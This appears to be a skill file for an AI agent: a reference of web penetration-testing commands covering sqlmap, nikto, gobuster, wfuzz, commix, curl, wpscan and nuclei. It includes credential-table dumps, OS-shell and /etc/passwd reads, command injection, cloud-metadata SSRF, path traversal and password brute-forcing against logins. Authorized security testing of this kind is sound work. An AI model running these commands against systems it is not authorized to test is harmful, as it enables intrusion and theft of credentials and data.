| name | pentest-web |
| description | Web application penetration testing tool reference. Covers sqlmap (SQL injection), nikto (web scanner), gobuster/dirb (directory brute-forcing), wfuzz (fuzzing), commix (command injection), and on-demand tools (ffuf, feroxbuster, wpscan, nuclei, OWASP ZAP, XSStrike). Use for web app vulnerability scanning and exploitation.
|
| version | 2.0.0 |
| triggers | ["web","website","web app","sqlmap","SQL injection","XSS","nikto","gobuster","directory brute","wpscan","WordPress","nuclei","ffuf","web vulnerability","CORS","SSRF"] |
Web Application Testing — Tool Reference
Sqlmap — SQL Injection
Detection
sqlmap -u "http://<target>/page?id=1" --batch
sqlmap -u "http://<target>/page?id=1" --batch --level=5 --risk=3 --threads=5
sqlmap -u "http://<target>/login" --data="user=admin&pass=test" --batch
sqlmap -u "http://<target>/api/data?id=1" --cookie="session=abc123" --batch
sqlmap -u "http://<target>/page?id=1&name=foo" -p "id" --batch
sqlmap -r request.txt --batch
Database Extraction
sqlmap -u "<url>" --batch --dbs
sqlmap -u "<url>" --batch -D <db> --tables
sqlmap -u "<url>" --batch -D <db> -T <table> --dump
sqlmap -u "<url>" --batch -D <db> -T <table> -C "username,password" --dump
sqlmap -u "<url>" --batch --search -C "password"
Advanced
sqlmap -u "<url>" --batch --tamper=space2comment,between,randomcase
sqlmap -u "<url>" --batch --os-shell
sqlmap -u "<url>" --batch --file-read="/etc/passwd"
sqlmap -u "<url>" --batch --proxy=http://127.0.0.1:8080
sqlmap -u "<url>" --batch --random-agent
sqlmap -u "<url>" --batch --fingerprint
Nikto — Web Server Scanner
nikto -h http://<target> -o /tmp/nikto.html -Format htm
nikto -h https://<target> -ssl
nikto -h <target> -p 8080
nikto -h http://<target> -id admin:password
nikto -h http://<target> -Pause 2
nikto -h http://<target> -useproxy http://127.0.0.1:8080
nikto -h http://<target> -Tuning 9
nikto -h <target> -p 80,443,8080,8443
Gobuster — Directory/DNS Brute-Forcing
Directory Mode
gobuster dir -u http://<target> -w /usr/share/seclists/Discovery/Web-Content/common.txt
gobuster dir -u http://<target> -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt,html,bak,old
gobuster dir -u http://<target> -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt -c "session=abc123"
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt -s "200,204,301,302,307"
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt -t 50 -r
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt -b "404,403"
DNS Mode
gobuster dns -d <domain> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d <domain> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -i
Vhost Mode
gobuster vhost -u http://<target> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Dirb — Directory Brute-Forcer
dirb http://<target>
dirb http://<target> /usr/share/seclists/Discovery/Web-Content/common.txt
dirb http://<target> -X .php,.txt,.bak
dirb http://<target> -r -z 200
dirb http://<target> -a "admin:password"
dirb http://<target> -p http://127.0.0.1:8080
dirb http://<target> -o /tmp/dirb_results.txt
Wfuzz — Web Fuzzer
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404 http://<target>/FUZZ
wfuzz -c -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404 "http://<target>/page?id=FUZZ"
wfuzz -c -w /usr/share/wordlists/rockyou.txt --hc 404 -d "user=admin&pass=FUZZ" http://<target>/login
wfuzz -c -w wordlist.txt --hc 404 -H "X-Forwarded-For: FUZZ" http://<target>/admin
wfuzz -c -w users.txt -w passwords.txt --hc 404 -d "user=FUZZ&pass=FUZ2Z" http://<target>/login
wfuzz -c -w wordlist.txt --hh 1234 http://<target>/FUZZ
wfuzz -c -w wordlist.txt --hc 404 -b "session=abc123" http://<target>/FUZZ
Commix — Command Injection
commix -u "http://<target>/page?cmd=test" --batch
commix -u "http://<target>/exec" --data="ip=127.0.0.1" --batch
commix -u "http://<target>/page?cmd=test" --cookie="session=abc123" --batch
commix -u "http://<target>/page?cmd=test" --os-cmd="id"
commix -u "http://<target>/page?cmd=test" --proxy=http://127.0.0.1:8080
Curl — HTTP Testing
curl -s -o /dev/null -w "%{http_code}" "http://<target>/admin"
curl -v "http://<target>/"
curl -X POST -d "user=admin&pass=test" "http://<target>/login" -v
curl -X PUT -H "Content-Type: application/json" -d '{"key":"value"}' "http://<target>/api/resource"
curl -s "http://<target>/../../../../etc/passwd"
curl -s "http://<target>/fetch?url=http://169.254.169.254/latest/meta-data/"
curl -H "Origin: http://attacker.example.com" -v "http://<target>/api/data"
curl -L -c /tmp/cookies.txt -b /tmp/cookies.txt "http://<target>/login"
curl -X OPTIONS "http://<target>/" -v
curl -X PUT "http://<target>/test.txt" -d "test" -v
curl -X DELETE "http://<target>/file" -v
On-Demand Web Tools
FFuf — Fast Fuzzer (Go)
ffuf -u http://<target>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,301,302
ffuf -u http://<target>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e .php,.txt,.bak
ffuf -u http://<target>/page?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
Feroxbuster — Recursive Content Discovery
feroxbuster --url http://<target> -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://<target> -x php,txt,bak --depth 3
WPScan — WordPress Scanner
wpscan --url http://<target> --enumerate vp,vt,u
wpscan --url http://<target> --enumerate vp --plugins-detection aggressive
wpscan --url http://<target> -U admin -P /usr/share/wordlists/rockyou.txt
Nuclei — Template-Based Scanner
nuclei -u http://<target> -t /usr/share/nuclei-templates/
nuclei -u http://<target> -severity critical,high
nuclei -l urls.txt -t /usr/share/nuclei-templates/cves/
Tool Selection Guide
| Situation | Best Tool |
|---|
| SQL injection testing | sqlmap -u '<url>' --batch |
| General web vuln scan | nikto -h <target> |
| Directory brute-forcing | gobuster dir (fastest) or dirb (simpler) |
| Parameter fuzzing | wfuzz or ffuf |
| Command injection | commix |
| WordPress site | wpscan (install on demand) |
| Template-based vuln scan | nuclei (install on demand) |
| Recursive content discovery | feroxbuster (install on demand) |
| Manual HTTP testing | curl |